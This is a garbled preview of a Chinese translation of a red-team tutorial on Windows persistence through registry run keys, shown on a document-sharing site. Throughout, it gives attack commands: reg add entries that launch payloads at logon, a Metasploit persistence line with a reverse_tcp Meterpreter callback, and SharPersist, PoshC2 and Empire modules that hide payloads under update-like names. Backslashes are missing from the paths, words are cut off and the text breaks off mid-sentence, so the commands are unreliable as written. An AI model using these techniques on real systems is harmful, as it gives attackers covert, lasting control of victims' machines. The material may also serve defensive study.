window權(quán)限維持一注冊(cè)表運(yùn)行鍵 作者bypass_W_第1頁
window權(quán)限維持一注冊(cè)表運(yùn)行鍵 作者bypass_W_第2頁
window權(quán)限維持一注冊(cè)表運(yùn)行鍵 作者bypass_W_第3頁
window權(quán)限維持一注冊(cè)表運(yùn)行鍵 作者bypass_W_第4頁
window權(quán)限維持一注冊(cè)表運(yùn)行鍵 作者bypass_W_第5頁
已閱讀5頁,還剩10頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

1、Window權(quán)限維持(一):注冊(cè)表運(yùn)行鍵 作者:Bypass原文鏈接:/s/msVon-U2Pr8fTQxxKVWAUA本文由 干貨 收集整理:/test/index.php譯文聲明:本文由Bypass整理并翻譯,僅用于安全研究和學(xué)習(xí)之用。原文地址:https:/pentestlab.blog/2019/10/01/persistence-registry-run-keys/在紅隊(duì)行動(dòng)中在網(wǎng)絡(luò)中獲得最初的立足點(diǎn)是一項(xiàng)耗時(shí)的任務(wù)。因此,持久性是紅隊(duì)成功運(yùn)作的關(guān)鍵,這將使團(tuán)隊(duì)能夠?qū)W⒂谀繕?biāo),而不會(huì)失去與指揮和控 務(wù)器

2、的通信。 在Windows登錄期間創(chuàng)建將執(zhí)行任意負(fù)載的注冊(cè)表項(xiàng)是紅隊(duì)游戲手冊(cè)中最古老的技巧之一。這種持久性技術(shù)需要?jiǎng)?chuàng)建注冊(cè)表運(yùn)行鍵各種威脅因素和已知工具,如Metasploit、Empire和SharPersist,都提供了這種能力,因此,成熟的SOC團(tuán)隊(duì)將能夠檢測(cè)到這種惡意活動(dòng)。 命令行注冊(cè)表項(xiàng)可以從終端添加到運(yùn)行鍵以實(shí)現(xiàn)持久性。這些鍵將包含對(duì)用戶登錄時(shí)將執(zhí)行的實(shí)際負(fù)載的引用,已知使用此持久性方法的威脅因素和紅隊(duì)使用以下注冊(cè)表位置。 reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v Pentestlab

3、 /t REG_SZ /d C:Userspentestlabpentestlab.exereg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce /v Pentestlab /t REG_SZ /d C:Userspentestla15注冊(cè)表當(dāng)前用戶的運(yùn)行鍵 如果已獲得提升的憑據(jù),則最好使用本地計(jì)算機(jī)注冊(cè)表位置,而不是當(dāng)前用戶,因?yàn)橛行ж?fù)載將在每次系統(tǒng)啟動(dòng)時(shí)執(zhí)行,而與使用系統(tǒng)身份驗(yàn)證的用戶無關(guān)。 reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent

4、VersionRun /v Pentestlab /t REG_SZ /d C:tmppentestlab.exereg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce /v Pentestlab /t REG_SZ /d C:tmppentestlab.exereg add注冊(cè)表運(yùn)行鍵本地計(jì)算機(jī) 在下一次登錄期間,有效負(fù)載將執(zhí)行并與回傳給Meterpeter。 Meterpreter 運(yùn)行鍵 另外兩個(gè)注冊(cè)表位置,這些位置可以允許紅隊(duì)通過執(zhí)行任意有效負(fù)載或DLL來實(shí)現(xiàn)持久性。這些將在登錄期間執(zhí)行,并且需要管

5、理員級(jí)別的 。 reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx0001 /v Pentestlab /t REG_SZ /d C:tmppentestlab.exereg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx0001Depend /v Pentestlab /t REG_SZ /d C:tMetasploitMeterpreter 任意DLLMetasploit Framework通過使用Met

6、erpreter腳本和后期利用模塊來支持通過注冊(cè)表的持久性。Meterpreter腳本將以VBS腳本的形式創(chuàng)建一個(gè)有效負(fù)載,該負(fù)載將被拖放到磁盤上,并將創(chuàng)建一個(gè)注冊(cè)表項(xiàng),該注冊(cè)表項(xiàng)將在用戶登錄期間運(yùn)行該有效負(fù)載。 run persistence -U -P windows/x64/meterpreter/reverse_tcp -i 5 -p 443 -r 1Metasploit Meterpreter持久性腳本 用戶下次登錄系統(tǒng)時(shí),將打開一個(gè)新的Meterpreter會(huì)話。 Metasploit Meterpreter會(huì)話 另外,還有一個(gè)后期開發(fā)模塊,可用于持久性。該模塊需要

7、以下配置,并將可執(zhí)行文件放置在受感染系統(tǒng)上的可寫位置。 use post/windows/manage/persistence_exeset REXEPATH /tmp/pentestlab.exeset SESSION 2set STARTUP USERset LOCALEXEPATH C:tmprunMetasploit 持久性利用后開發(fā)模塊配置 由于已選擇 USER作為選項(xiàng),該模塊將使用當(dāng)前用戶的注冊(cè)表位置。 Metasploit 持久性后期開發(fā)模塊 如果已獲得系統(tǒng)級(jí)別的 ,則可以將該模塊配置為在 HKLM位置中創(chuàng)建注冊(cè)表項(xiàng)。該 STARTUP選項(xiàng)將需要改變系統(tǒng)。 set STARTUP

8、 SYSTEMSharPersistMetasploit 作為系統(tǒng)的持久性模塊 SharPersist是 Brett Hawkins在C中開發(fā)的工具,它結(jié)合了多種持久性技術(shù),包括添加注冊(cè)表運(yùn)行鍵。該工具包可以加載到支持反射加載的各種命令和控制框架中,例如CobaltStrike和PoshC2。以下命令將創(chuàng)建一個(gè)注冊(cè)表項(xiàng),該注冊(cè)表項(xiàng)將從與MetasploitFramework模塊相同的注冊(cè)表位置執(zhí)行任意有效負(fù)載。 SharPersist -t reg -c C:WindowsSystem32cmd.exe -a /c C:tmppentestlab.exe -k hkcurun -v pente

9、stlab -m addSharPersist 以用戶身份注冊(cè) 如果已獲得提升的訪問權(quán)限,請(qǐng)修改命令以在本地計(jì)算機(jī)位置中安裝注冊(cè)表項(xiàng),以實(shí)現(xiàn)所有用戶的持久性。 SharPersist -t reg -c C:WindowsSystem32cmd.exe -a /c C:tmppentestlab.exe -k hklmrun -v pentestlab -m add -o envSharPersist 注冊(cè)為SYSTEMSharPersist還通過 RunOnce和 RunOnceEx注冊(cè)表項(xiàng)包含持久性功能。以下命令將在這些位置創(chuàng)建注冊(cè)表項(xiàng),這些注冊(cè)表項(xiàng)將執(zhí)行任意有效負(fù)載。 SharPersi

10、st -t reg -c C:WindowsSystem32cmd.exe -a /c pentestlab.exe -k hklmrunonce -v Pentestlab -m addSharPersist -t reg -c C:WindowsSystem32cmd.exe -a /c pentestlab.exe -k hklmrunonceex -v Pentestlab -m addSharPersist -t reg -c C:WindoSharPersist RunOnce注冊(cè)表項(xiàng) SharPersist還提供了使用另一個(gè)注冊(cè)表位置進(jìn)行持久化的選項(xiàng)( UserInitMprLo

11、gonScript)。 SharPersist -t reg -c C:WindowsSystem32cmd.exe -a /c pentestlab.exe -k logonscript -m addSharPersist 登錄腳本 PoshC2PoshC2支持各種持久性功能,包括注冊(cè)表運(yùn)行鍵的方法。以下命令將在目標(biāo)主機(jī)中創(chuàng)建兩個(gè)注冊(cè)表項(xiàng)。 install-persistencePoshC2 持久性 注冊(cè)表的“運(yùn)行”項(xiàng)將具有IEUpdate的名稱,以便看起來合法,第二個(gè)注冊(cè)表項(xiàng)將作為墻紙隱藏在注冊(cè)表中。 PoshC2 注冊(cè)表運(yùn)行鍵 Empire如果將Empire用作命令和控件,Empire包

12、含兩個(gè)與通過注冊(cè)表運(yùn)行項(xiàng)與持久性技術(shù)對(duì)齊的模塊。根據(jù) 級(jí)別,這些模塊將嘗試在以下注冊(cè)表位置中安 ase64有效負(fù)載: HKCU:SOFTWAREMicrosoftWindowsCurrentVersionDebugHKLM:SOFTWAREMicrosoftWindowsCurrentVersionDebugEmpire Debug 注冊(cè)表項(xiàng)有效負(fù)載 usemodule persistence/userland/registryusemodule persistence/elevated/registry*Empire Persistence Registry Module將在名稱 Updater下創(chuàng)建另一個(gè)注冊(cè)表項(xiàng),該注冊(cè)表項(xiàng)將包含要執(zhí)行的命令。Power

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論